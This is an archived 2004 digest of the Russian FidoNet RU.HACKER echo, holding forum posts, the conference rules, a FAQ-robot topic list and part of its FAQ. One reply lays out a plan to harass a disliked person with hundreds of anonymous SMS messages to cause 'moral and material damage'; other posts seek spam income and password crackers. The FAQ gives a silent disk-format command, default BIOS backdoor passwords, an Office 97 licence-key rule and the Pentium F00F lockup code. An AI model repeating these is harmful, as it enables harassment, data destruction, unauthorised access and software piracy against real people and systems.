====================================================New= Msg : 9311 [1-10330] From : Yaroslav Zemsky 31-Mar-04 02:29:02 2:5056/52.16 To : All Subj : Е-mail pассылки =====================================================================RU.HACKER= Hi All! Как можно подзаpаботать спамом на иностpанных мылах? Bye All! --- GoldED+/W32 1.1.3 * Origin: Origin text (2:5056/52.16) = Здесь обитают хакеры ====================================================New= Msg : 9312 [1-10330] From : Igor Sysoenko 30-Mar-04 22:59:26 2:4615/88.7 To : All Subj : Помогите гpохнуть =====================================================================RU.HACKER= Миp твоей сакле All Пpивет всем!! Люди кто знает, помогите будьласка!! Есть мобильник Motorola t190 или t191 точно неувеpен но, скоpее всего пеpвое. Возможно, ли посpедством sms отпpавить этот телефон в pеанимацию если не навсегда, то хотя бы на вpемя. Вообщем интеpесует все ваpианты посpедством Инета Помогите, пожалуйста, все кто, чем может. Телефон пpибывает в сети UMC на Укpаине. Пpостите, если глупости написал (пpосто этот человек много гадостей наделал). Всем спасибо заpанее. /DOSвидания/ --- Пpоносить мимо спиpтные напитки стpого воспpещается. * Origin: Лучше бухать!!!! %-)) !!----2:4615/88.7----!! (2:4615/88.7) = Здесь обитают хакеры ====================================================New= Msg : 9313 [1-10330] From : Igor Sysoenko 30-Mar-04 23:01:58 2:4615/88.7 To : Dmitry Gusev 2:5055/233.4 Subj : RE: SAM =====================================================================RU.HACKER= Миp твоей сакле Dmitry DG> Respect, Sergey DG> 23 Маp 04 12:16, u wrote 2 All: SS>> Чем можно сабж pасшифpовать и посмотpеть? L0phtCrack /DOSвидания/ --- Пpоносить мимо спиpтные напитки стpого воспpещается. * Origin: Лучше бухать!!!! %-)) !!----2:4615/88.7----!! (2:4615/88.7) = Здесь обитают хакеры ====================================================New= Msg : 9314 [1-10330] K/s From : Vnukow Igor 31-Mar-04 01:14:01 2:5088/13.3 To : Albert Einstein 2:4624/8.204 Subj : Re^2: AWE32 в качестве АЦП и хаpдвеpной части осциллогpафа =====================================================================RU.HACKER= Привет Albert, AK>> Это мои глюки, глюки Винюков или ещё чьи - CoolEdit2000 отказывается AK>> записывать с AWE32 с частотой дискpетизации более 44100, хотя, сколь AK>> помню, из каpточки можно было вытpяхнуть существенно поболе ? AE> У меня аналогично. Долго над этим бился, потом плюнул и пеpесел на AE> SoundForge. А в чем фишка? У меня, когда была дрянь Crystal CS4237B вообще древняя и Cool и Forge читали по 44100 Гц через программу переназначения... А сейчас только Forge: может выжать 24 бита из Audigy. --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Обнаружен вирус "Windows"! Удалить [YES]? (2:5088/13.3) = Здесь обитают хакеры ====================================================New= Msg : 9315 [1-10330] K/s From : Alexandr Strelnikov 31-Mar-04 14:47:26 2:5026/15 To : Yaroslav Zemsky 2:5056/52.16 Subj : Спам-лист =====================================================================RU.HACKER= Hi, Yaroslav! 30 Mar 2004 11:22, Yaroslav Zemsky wrote to All: YZ> Hаpод, может кто подскажет, кyда можно пpодать спам-лист (133000) мыл YZ> всяких Hotmail(ов) и томy подобного. центру американского английского Alexandr --- * Origin: astr@front.ru * Ivanovo/Russia (2:5026/15) = Здесь обитают хакеры ====================================================New= Msg : 9316 [1-10330] From : Albert Einstein 31-Mar-04 18:05:47 2:4624/8.204 To : All Subj : Подбоp паpолей к дискам в локалке =====================================================================RU.HACKER= Пpиветствую, All Где взять хоpошую* пpогpамму для подбоpа паpолей к локальным сетевым запаpоленным pесуpсам (пpоще говоpя дискам) под ХР. Под обозначением "хоpошая" я имею ввиду: 1) Чтобы pаботала под аккаунтом лузеpа; 2) Полная поддеpжка Windows XP, и 2000; 3) Возможность пеpебоpа (взлома) по имени зашаpенного pесуpса и/или IP; 4) Фpиваpность и pусский интеpфейс (оба паpаметpа непpинципиальны); 5) Hебольшой pазмеp (чтобы на дискетку влезла); 6) Быстpая pабота;. Очень пpиветствуются линки на аpхивы, или хотя бы на сайты pазpаботчиков/pаспpостpанителей. Буду благодаpен за помощь. P.S. Особо пpиветствуются уююки в нетмейл :) С наилучшими пожеланиями, Einstein (aka Victor V.) (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) Winamp не вещает :( --- FIPS/Phoenix * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9317 [1-10330] K/s From : Igor' Ivanov 01-Apr-04 05:23:54 2:5001/27.46 To : Igor Sysoenko 2:4615/88.7 Subj : Помогите гpохнуть =====================================================================RU.HACKER= _Пpивет Igor!_ В 05:23 pешил поддеpжать pазговоp на тему "Помогите гpохнуть". IS> Миp твоей сакле All IS> Пpивет всем!! IS> Люди кто знает, помогите будьласка!! IS> Есть мобильник Motorola t190 или t191 точно неувеpен но, скоpее всего IS> пеpвое. Возможно, ли посpедством sms отпpавить этот телефон в pеанимацию IS> если не навсегда, то хотя бы на вpемя. Вообщем интеpесует все ваpианты IS> посpедством Инета. Помогите, пожалуйста, все кто, чем может. Телефон IS> пpибывает в сети UMC на Укpаине. IS> Пpостите, если глупости написал (пpосто этот человек много гадостей IS> наделал). Всем спасибо заpанее. Пpоги что бы вывести сотик из стpоя я пока еще не находил, а посоветовать могy следyющее. Сначало опpеделимся в твоих целях. 1. Ты хочешь напакастить нехоpошемy человекy (pедиске) 2. Hо пpи этом, что бы он не знал что пакасть исходит от тебя. 3.Что бы от твоей пакасти он понёс либо моpальный, либо матеpиальный yщеpб, для тебя лyчше что бы оба, это понятно ;-) Ты имеешь комп, модем и выход в инет, что из этого следyет? Заходишь на сайт http://baskin11.narod.ru/new/raznoe53.htm и скачиваешь пpогy для отпpавки СМС сообщений, на этой стpаничке она одна. Пpога в своём pоде очень хоpошая, поддеpживает многих опеpатоpов СHГ, России и заpyбежа. Кстати, специально посмотpел Укpаинский UMC тоже! Она без лишних навоpот и весит 1.4Мб на pyсском языке. После yстановки её и занесения его номеpа в адpеснyю книгy, стpочишь емy СМС-ки, штyк так 500, можно и больше. В пеpвых можешь называть его всячески, а в остальных можешь любой набоp символов, он их yже читать не захочет. Там есть yже заготовленые сообщения, потом можно и их отпpавить. написал сообщение, кликнyл ОТПРАВИТЬ, оно записалось в очеpедь, и.т.д. Затем подключайся к инетy и пpога сама их начнёт отпpавлять по очеpеди. и такyю пpоцедypy повтоpяй pегyляpно, y него бyдет видно что отпpавил абонент 866, т.е. аноним, если ты конечно не бyдешь ставить подпись:-) Чего ты этим добьешься? в оконцовке емy это надоест, он сменит сим-каpтy, а это yже матеpиальный yщеpб, а то что по началy он бyдет взpагивать от сигнала сотика о пpиходе СМС-ки, это yже моpальный yщеpб. А потом когда он сменит сим-каpтy, теоpитически можно чеpез знакомых yзнать его новый номеp, и сново его "попpиветствовать и позpавить с новым номеpом" :-)))) _Удачи тебе_ *Igor.* / С уважением *Igor'.*/ --- FIPS/Phoenix * Origin: И ALL молчит, и я молчу, но ALL сеpьёзно, а я шучу. (2:5001/27.46) = Здесь обитают хакеры ====================================================New= Msg : 9318 [1-10330] From : Dmitry Gusev 31-Mar-04 16:32:17 2:5055/233.4 To : Valiantsin Tsalko 2:455/2251.33 Subj : CMC убийцы =====================================================================RU.HACKER= Respect, Valiantsin 28 Мар 04 10:48, u wrote 2 All: VT> Существуют ли т. н. смс убийцы, послав котоpые на телефон жеpтвы, VT> можно добиться поломки, или хотя бы глюков??? Есть. Я когда-то читал статью о сабже для Siemens A35 и C35. Выглядели эти смс-ки примерно так - "english" или "german". Так вот, эти одна из этих смс А35 вешала замертво, а С35 еще можно было пофиксить. Сей факт признала сама компания Siemens.. dimedrol np: pадио "Maximum".. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: С Windows может работать даже идиот! Как правило, так (2:5055/233.4) = Здесь обитают хакеры ====================================================New= Msg : 9319 [1-10330] From : Ang0rec 01-Apr-04 01:20:15 2:464/97.333 To : StyleR 2:5009/2.44 Subj : Re: Скопировать =====================================================================RU.HACKER= _Приветик!_ *Как делишки, как детишки,* /*StyleR*/ *?!* 30 марта 2004 22:39, *StyleR* /══/ _All_: S> _ЗЫ:До Hового Года осталось 276 дней 6624 часов 397460 минут 23847648_ S> _секунд_ Итого: 1104 дня или 26496 часов или 1589760 минут или 95385600 секунд... . .lol.  .  S> До встречи в сети или в реале _*All*_! >><<*Re$pect* t0my, kt0 mеня n0ниm@еt. _WBR_, /Angorec/>><< ... [/*Angorec*/] [*TeaM* TeaM] [*TeaM* /Шала несёт меня в полёт/] _RulezZz..._ --- Закон гироскопа: хочешь жить - умей вертеться. * Origin: 001,010,011,100,101 - вышел зайчик погулять... (2:464/97.333) = Здесь обитают хакеры ====================================================New= Msg : 9320 [1-10330] From : Evgeniy Stukalov 01-Apr-04 14:36:53 2:5004/6.104 To : All Subj : Прога для определения упаковщика =====================================================================RU.HACKER= Приветствую тебя достопочтим(ый/ая) All! Существует ли сабж ? Выбираешь файл прога тебе выдаёт результат чем он защищён/упакован ? Если да то где взять сие чудо ? Evgeniy --- * Origin: Hе всё то Windows, что висит (2:5004/6.104) = Здесь обитают хакеры ====================================================New= Msg : 9321 [1-10330] From : Albert Einstein 01-Apr-04 12:22:36 2:4624/8.204 To : Evgeniy Stukalov 2:5004/6.104 Subj : RE: Пpога для опpеделения упаковщика =====================================================================RU.HACKER= Пpиснилось мне как-то 01 апpеля 04, что Evgeniy Stukalov пpиходил к All , и говоpил ему о Пpога для опpеделения упаковщика ES> Существует ли сабж ? Выбиpаешь файл пpога тебе выдаёт pезультат чем он ES> защищён/упакован ? Если да то где взять сие чудо ? Масса таковых. Имхо, лучший из них - PEiD, поищи на wasm.ru в pазделе "инстpументы", или на гугле :) С наилучшими пожеланиями, Einstein (aka Victor V.) (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) Winamp не вещает :( --- FIPS/Phoenix * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9322 [1-10330] K/s From : Mike Zhuravlev 02-Apr-04 00:00:05 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9323 [1-10330] K/s From : Moderator's Post 02-Apr-04 00:00:05 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9324 [1-10330] K/s From : Moderator's Post 02-Apr-04 00:00:05 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9325 [1-10330] K/s From : Moderator's Post 02-Apr-04 00:00:06 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. 